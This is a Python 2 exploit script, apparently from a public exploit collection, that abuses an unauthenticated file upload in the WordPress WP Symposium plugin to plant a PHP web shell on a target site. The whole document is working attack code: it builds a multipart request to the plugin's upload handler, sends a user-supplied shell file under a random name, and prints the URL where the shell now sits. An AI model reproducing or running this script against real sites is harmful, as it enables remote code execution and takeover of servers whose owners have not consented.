WP Symposium Xploit Shell Upload


# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists a,nd has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):

   getfields = dict()
   getfields['uploader_uid'] = '1'
   getfields['uploader_dir'] = './'+randDirName
   getfields['uploader_url'] = url_symposium_upload

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body

banner = """
   ____                      _        ____          _
 / ___| __ _ _ __ _   _  __| | __ _ / ___|___   __| | ___ _ __ ___
| |  _ / _` | '__| | | |/ _` |/ _` | |   / _ \ / _` |/ _ \ '__/ __|
| |_| | (_| | |  | |_| | (_| | (_| | |__| (_) | (_| |  __/ |  \__ \
  \____|\__,_|_|   \__,_|\__,_|\__,_|\____\___/ \__,_|\___|_|  |___/
"""

commandList = optparse.OptionParser('usage: %prog -t URL -f NAMASHELL.PHP [--timeout ]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout

print(banner)

socket.setdefaulttimeout(timeout)

url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

randDirName = id_generator()
randShellName = id_generator()

bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
    req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
    response = urllib2.urlopen(req)
    read = response.read()

    if "error" in read or read == "0" or read == "":
       print("[X] Upload Failed :(")
    else:
       print("[>]Shell Uploaded")
       print("[--] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))